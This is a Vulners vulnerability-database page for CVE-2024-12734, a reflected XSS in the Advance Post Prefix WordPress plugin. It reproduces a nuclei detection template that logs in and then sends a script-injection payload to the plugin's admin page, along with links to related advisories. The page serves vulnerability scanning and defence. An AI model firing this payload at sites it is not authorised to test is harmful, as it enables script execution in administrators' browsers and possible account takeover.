Lucene search
K

Advance Post Prefix WordPress plugin - Reflected XSS

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Advance Post Prefix WordPress plugin up to 1.1.1 has reflected XSS via unsanitized admin output.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12734
5 Feb 202604:57
circl
CNNVD
WordPress plugin Advance Post Prefix 安全漏洞
15 May 202500:00
cnnvd
CVE
CVE-2024-12734
15 May 202520:06
cve
Cvelist
CVE-2024-12734 Advance Post Prefix <= 1.1.1 - Reflected XSS
15 May 202520:06
cvelist
EUVD
EUVD-2025-15323
3 Oct 202520:07
euvd
NVD
CVE-2024-12734
15 May 202520:15
nvd
OSV
CVE-2024-12734
15 May 202520:15
osv
Patchstack
WordPress Advance Post Prefix plugin <= 1.1.1 - Reflected XSS vulnerability
19 May 202500:04
patchstack
Positive Technologies
PT-2025-21437
15 May 202500:00
ptsecurity
RedhatCVE
CVE-2024-12734
17 May 202521:03
redhatcve
Rows per page
id: CVE-2024-12734

info:
  name: Advance Post Prefix WordPress plugin - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Advance Post Prefix WordPress plugin through 1.1.1 contains a reflected cross-site scripting caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version of Advance Post Prefix WordPress plugin.
  reference:
    - https://wpscan.com/vulnerability/038b44dc-0495-4f56-ae7e-c78a265aa535/
    - https://nvd.nist.gov/vuln/detail/cve-2024-12734
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12734
    cwe-id: CWE-79
    epss-score: 0.00521
    epss-percentile: 0.40479
    cpe: cpe:2.3:a:niceit:advance_post_prefix:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: niceit
    product: advance_post_prefix
  tags: cve,cve2024,niceit,advance-post-prefix,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=add-prefix&post="></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`","advance-post-prefix")
        condition: and
# digest: 4a0a00473045022100c94c346a5e06024f312c8a2e2f5bcbf87f085ead39e56bdaebd99719ac9f00c702203d5d6967155d4dc1801c553fc7628c76285a4b6be28622e5eea7ea174b7fe497:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2026 04:57Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.1
EPSS0.00521
SSVC
10